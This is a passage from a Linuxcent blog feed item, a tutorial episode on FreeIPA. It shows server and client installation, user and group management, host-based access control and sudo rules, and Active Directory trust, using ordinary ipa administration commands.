      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text;
        if(code){
          text=code.innerText;
        }else{
          // No inner code element: the button itself lives inside this pre, so hide it while
          // reading (innerText skips display:none nodes) to keep its label out of the copied text.
          btn.style.display='none';
          text=pre.innerText;
          btn.style.display='';
        }
        // The async Clipboard API only works in secure contexts; otherwise use the legacy fallback.
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Show the success state for two seconds, then restore the default label.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  // Show the failure state for two seconds, then restore the default label.
  function fail(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  // Legacy fallback: copy via a temporary off-screen textarea and execCommand.
  function fb(text,btn){
    var ta=document.createElement('textarea');
    var copied=false;
    ta.value=text;
    ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
    try{
      document.body.appendChild(ta);
      ta.select();
      // execCommand reports failure by returning false rather than throwing, so keep the result.
      copied=document.execCommand('copy');
    }catch(e){
      copied=false;
    }finally{
      // Always remove the helper textarea, even when the copy attempt threw.
      if(ta.parentNode)ta.parentNode.removeChild(ta);
    }
    if(copied){ok(btn);}else{fail(btn);}
  }
  // Run immediately if the DOM is already parsed, otherwise wait for it.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>The Identity Stack, Episode 8</em><br />
<a href="/ldap-high-availability/">EP07: LDAP HA</a> → <strong>EP08</strong> → <a href="/active-directory-ldap-kerberos/">EP09: Active Directory</a> → &#8230;</p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>FreeIPA is 389-DS (LDAP) + MIT Kerberos + Dogtag PKI + Bind DNS + SSSD — one <code class="" data-line="">ipa-server-install</code> command gets you an enterprise identity platform</li>
<li>Host-Based Access Control (HBAC) lets you define centrally: which users can SSH to which hosts — no more managing <code class="" data-line="">/etc/security/access.conf</code> per machine</li>
<li>Sudo rules from the directory: define <code class="" data-line="">sudo</code> policy centrally, have every machine pull it — no <code class="" data-line="">/etc/sudoers.d/</code> files scattered across the fleet</li>
<li><code class="" data-line="">ipa</code> CLI is the management interface — <code class="" data-line="">ipa user-add</code>, <code class="" data-line="">ipa group-add</code>, <code class="" data-line="">ipa hbacrule-add</code> — everything that took five LDAP commands takes one <code class="" data-line="">ipa</code> command</li>
<li>FreeIPA trusts with Active Directory let Linux machines authenticate AD users without joining the AD domain</li>
<li>The right choice for Linux-centric environments; AD is the right choice when Windows clients dominate</li>
</ul>
<hr />
<h2 id="the-big-picture-what-freeipa-integrates">The Big Picture: What FreeIPA Integrates</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────┐
│                    FreeIPA Server                        │
│                                                         │
│  389-DS (LDAP)    MIT Kerberos    Dogtag PKI            │
│  ─────────────    ───────────     ─────────             │
│  User/group       TGT + service   Machine certs         │
│  storage          ticket issuing  User certs             │
│                                   OCSP / CRL            │
│  Bind DNS         SSSD (client)   Apache (WebUI)        │
│  ──────────       ────────────    ──────────────        │
│  SRV records      Enrollment      Management UI         │
│  for KDC/LDAP     automation      REST API              │
└─────────────────────────────────────────────────────────┘
              ▲                  ▲
              │ enrollment       │ SSH + sudo rules
   ┌──────────┴──────────┐  ┌───┴──────────────────┐
   │  Linux client        │  │  Linux client         │
   │  (ipa-client-install)│  │  (ipa-client-install) │
   └─────────────────────┘  └──────────────────────┘
</code></pre>
<p>EP06 and EP07 built OpenLDAP from components. FreeIPA gives you all of that plus Kerberos, PKI, DNS, and HBAC — opinionated, integrated, and managed through a single CLI and WebUI. This episode shows what you actually get from it.</p>
<hr />
<h2 id="why-freeipa-instead-of-bare-openldap">Why FreeIPA Instead of Bare OpenLDAP</h2>
<p>Running bare OpenLDAP requires you to:</p>
<ul>
<li>Configure schema for POSIX accounts, SSH keys, sudo rules, HBAC manually</li>
<li>Set up MIT Kerberos separately and integrate it with LDAP</li>
<li>Build your own PKI for machine certificates</li>
<li>Maintain DNS SRV records for Kerberos discovery</li>
<li>Write client enrollment scripts</li>
<li>Build a management interface (or live in LDIF)</li>
</ul>
<p>FreeIPA does all of this in one installer, with a consistent data model across all components. The trade-off is opacity — FreeIPA makes decisions for you (schema, replication topology, Kerberos realm name) that bare OpenLDAP leaves to you.</p>
<hr />
<h2 id="installing-freeipa-server">Installing FreeIPA Server</h2>
<pre><code class="" data-line=""># RHEL / Rocky / AlmaLinux
dnf install -y freeipa-server freeipa-server-dns

# Run the installer (interactive)
ipa-server-install

# Or non-interactive:
ipa-server-install \
  --realm=CORP.COM \
  --domain=corp.com \
  --ds-password=DM_password \
  --admin-password=Admin_password \
  --setup-dns \
  --forwarder=8.8.8.8 \
  --unattended

# After install: get an admin Kerberos ticket
kinit admin
</code></pre>
<p>The installer creates:</p>
<ul>
<li>389-DS instance with the FreeIPA schema</li>
<li>MIT KDC with realm <code class="" data-line="">CORP.COM</code></li>
<li>Dogtag CA and all certificate infrastructure</li>
<li>Bind DNS with SRV records for the KDC and LDAP server</li>
<li>Apache WebUI at <code class="" data-line="">https://ipa.corp.com/ipa/ui/</code></li>
<li>SSSD configured on the server itself</li>
</ul>
<p>Time: 5–10 minutes — for what used to take a week of manual configuration.</p>
<hr />
<h2 id="the-ipa-cli">The ipa CLI</h2>
<p>Every management action goes through <code class="" data-line="">ipa</code>. It talks to the IPA server&#8217;s REST API and handles Kerberos authentication transparently (it uses your <code class="" data-line="">kinit</code> session).</p>
<pre><code class="" data-line=""># Users
ipa user-add vamshi \
  --first=Vamshi --last=Krishna \
  --email=vamshi@corp.com \
  --password

ipa user-show vamshi
ipa user-find --all              # search all users
ipa user-disable vamshi          # lock account without deleting
ipa user-mod vamshi --shell=/bin/zsh

# Groups
ipa group-add engineers --desc &quot;Engineering team&quot;
ipa group-add-member engineers --users=vamshi,alice

# Password policy
ipa pwpolicy-mod --minlength=12 --maxlife=90 --history=10

# SSH public keys — stored centrally, pushed to every host
ipa user-mod vamshi --sshpubkey=&quot;ssh-ed25519 AAAA...&quot;
# SSSD on enrolled hosts will use this key for SSH login — no authorized_keys file needed
</code></pre>
<hr />
<h2 id="host-based-access-control-hbac">Host-Based Access Control (HBAC)</h2>
<p>HBAC is the feature that justifies FreeIPA for most Linux shops. It lets you define centrally: which users (or groups) can log in to which hosts (or host groups), using which services (SSH, sudo, FTP).</p>
<p>Without HBAC, access control is per-machine: <code class="" data-line="">/etc/security/access.conf</code> or PAM <code class="" data-line="">pam_access</code> rules, replicated across every server, managed inconsistently.</p>
<p>With HBAC: one rule, enforced everywhere.</p>
<pre><code class="" data-line=""># Create host groups
ipa hostgroup-add production-servers --desc &quot;Production Linux hosts&quot;
ipa hostgroup-add-member production-servers --hosts=web01.corp.com,db01.corp.com

# Create user groups
ipa group-add sre-team
ipa group-add-member sre-team --users=vamshi,alice

# Create an HBAC rule
ipa hbacrule-add allow-sre-to-prod \
  --desc &quot;SRE team can SSH to production&quot;
ipa hbacrule-add-user allow-sre-to-prod --groups=sre-team
ipa hbacrule-add-host allow-sre-to-prod --hostgroups=production-servers
ipa hbacrule-add-service allow-sre-to-prod --hbacsvcs=sshd

# Test the rule before applying
ipa hbactest \
  --user=vamshi \
  --host=web01.corp.com \
  --service=sshd
# Access granted: True
# Matched rules: allow-sre-to-prod
</code></pre>
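<p>SSSD on each enrolled host enforces the HBAC rules at login time by querying the IPA server. No per-machine configuration. Add a new server to the <code class="" data-line="">production-servers</code> host group and the HBAC rules apply immediately. One caveat: a fresh FreeIPA install ships with an <code class="" data-line="">allow_all</code> HBAC rule that lets every user log in to every host. Once your own rules are in place and tested, disable it with <code class="" data-line="">ipa hbacrule-disable allow_all</code> — otherwise the restrictive rules have no effect.</p>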
<hr />
<h2 id="sudo-rules-from-the-directory">Sudo Rules from the Directory</h2>
<pre><code class="" data-line=""># Create a sudo rule
ipa sudorule-add allow-sre-sudo \
  --cmdcat=all \
  --desc &quot;SRE team gets full sudo on production&quot;
ipa sudorule-add-user allow-sre-sudo --groups=sre-team
ipa sudorule-add-host allow-sre-sudo --hostgroups=production-servers

# Or a scoped rule — only specific commands
ipa sudorule-add allow-service-restart
ipa sudocmdgroup-add service-commands
ipa sudocmd-add /usr/bin/systemctl
ipa sudocmdgroup-add-member service-commands --sudocmds=&quot;/usr/bin/systemctl&quot;
ipa sudorule-add-allow-command allow-service-restart --sudocmdgroups=service-commands
</code></pre>
<p>On enrolled hosts, SSSD&#8217;s <code class="" data-line="">sssd_sudo</code> responder pulls these rules and the <code class="" data-line="">sudo</code> command evaluates them locally. No <code class="" data-line="">/etc/sudoers.d/</code> files. Central policy, local enforcement.</p>
<hr />
<h2 id="enrolling-a-client">Enrolling a Client</h2>
<pre><code class="" data-line=""># On the client machine
dnf install -y freeipa-client

ipa-client-install \
  --domain=corp.com \
  --server=ipa.corp.com \
  --realm=CORP.COM \
  --principal=admin \
  --password=Admin_password \
  --unattended

# What this does:
# 1. Registers the host in IPA as a machine principal
# 2. Retrieves a host Kerberos keytab (/etc/krb5.keytab)
# 3. Configures SSSD (sssd.conf, nsswitch.conf, pam.d)
# 4. Configures Kerberos (/etc/krb5.conf)
# 5. Optionally configures NTP and DNS
</code></pre>
<p>After enrollment: <code class="" data-line="">getent passwd vamshi</code> returns the IPA user. SSH with an IPA password works. HBAC rules are enforced. Sudo rules from the directory apply. SSH public keys from the user&#8217;s IPA profile work without <code class="" data-line="">authorized_keys</code> files.</p>
<hr />
<h2 id="freeipa-trust-with-active-directory">FreeIPA Trust with Active Directory</h2>
<p>In mixed environments (Linux servers + Windows clients), you can establish a trust between FreeIPA and AD without joining the Linux servers to the AD domain directly.</p>
<pre><code class="" data-line=""># On the IPA server (after installing ipa-server-trust-ad)
ipa-adtrust-install --netbios-name=CORP

# Establish the trust
ipa trust-add ad.corp.com \
  --admin=Administrator \
  --password \
  --type=ad

# AD users can now log in to IPA-enrolled Linux hosts
# They appear as: username@ad.corp.com or AD\username (the AD domain, not the IPA realm)
</code></pre>
<p>Under the hood: FreeIPA acts as an SSSD-enabled Samba DC for the trust relationship. AD users&#8217; Kerberos tickets from the AD KDC are accepted by the FreeIPA KDC, which maps them to POSIX attributes stored in IPA (or automatically generated via ID mapping).</p>
<hr />
<h2 id="common-misconceptions"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Common Misconceptions</h2>
<p><strong>&#8220;FreeIPA is just OpenLDAP with a UI.&#8221;</strong> FreeIPA uses 389-DS (not OpenLDAP), adds a full Kerberos KDC, a certificate authority, DNS, HBAC enforcement, and sudo management — all with a consistent schema designed for these use cases. It&#8217;s an integrated identity platform, not a wrapper.</p>
<p><strong>&#8220;HBAC rules replace firewall rules.&#8221;</strong> HBAC controls who can log in to a host at the authentication layer — not network access. When HBAC denies a user, the SSH session is rejected only after the TCP connection has already been established. You still need firewall rules to block TCP access.</p>
<p><strong>&#8220;FreeIPA replicas are identical.&#8221;</strong> FreeIPA uses 389-DS Multi-Supplier replication. All replicas accept reads and writes. But the CA is separate — only the initial server (and explicitly designated CA replicas) run the CA. If the CA goes down, certificate operations stop; authentication does not.</p>
<hr />
<h2 id="framework-alignment">Framework Alignment</h2>
<table>
<thead>
<tr>
<th>Domain</th>
<th>Relevance</th>
</tr>
</thead>
<tbody>
<tr>
<td>CISSP Domain 5: Identity and Access Management</td>
<td>FreeIPA is an enterprise IAM platform — HBAC, sudo policy, SSH key management, and certificate-based authentication are all IAM controls</td>
</tr>
<tr>
<td>CISSP Domain 3: Security Architecture and Engineering</td>
<td>FreeIPA&#8217;s integrated CA enables certificate-based authentication for machines and users — a stronger authentication factor than passwords</td>
</tr>
<tr>
<td>CISSP Domain 1: Security and Risk Management</td>
<td>Centralized HBAC and sudo policy reduces the attack surface of privilege escalation — no more inconsistent sudoers files that drift across the fleet</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>FreeIPA = 389-DS + MIT Kerberos + Dogtag PKI + BIND DNS — one installer, one management interface</li>
<li>HBAC rules define centrally who can SSH to which host groups — enforced by SSSD on every enrolled client, no per-machine config</li>
<li>Sudo rules from the directory replace scattered <code class="" data-line="">/etc/sudoers.d/</code> files — central policy, SSSD-enforced locally</li>
<li><code class="" data-line="">ipa hbactest</code> lets you verify access rules before a user hits a blocked login — use it before every policy change</li>
<li>For Linux-centric environments: FreeIPA. For Windows-dominant environments: AD. For mixed: FreeIPA trust with AD.</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>FreeIPA is the Linux answer to enterprise identity. EP09 covers the Microsoft answer — Active Directory — which extended LDAP and Kerberos into a complete enterprise platform with Group Policy, Sites, and a replication model built for global scale.</p>
<p><em>Next: <a href="https://linuxcent.com/active-directory-ldap-kerberos/">How Active Directory Works: LDAP, Kerberos, and Group Policy Under the Hood</a></em></p>
<p>Get EP09 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&amp;linkname=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Ffreeipa-linux-identity-management%2F&#038;title=FreeIPA%3A%20LDAP%20%2B%20Kerberos%20%2B%20PKI%20in%20a%20Single%20Linux%20Identity%20Stack" data-a2a-url="https://linuxcent.com/freeipa-linux-identity-management/" data-a2a-title="FreeIPA: LDAP + Kerberos + PKI in a Single Linux Identity Stack"></a></p><p>The post <a href="https://linuxcent.com/freeipa-linux-identity-management/">FreeIPA: LDAP + Kerberos + PKI in a Single Linux Identity Stack</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/freeipa-linux-identity-management/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1793</post-id>	</item>
	</channel>
</rss>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.boldgrid.com/w3-total-cache/?utm_source=w3tc&utm_medium=footer_comment&utm_campaign=free_plugin

Page Caching using Disk: Enhanced 

Served from: linuxcent.com @ 2026-07-03 03:54:50 by W3 Total Cache
-->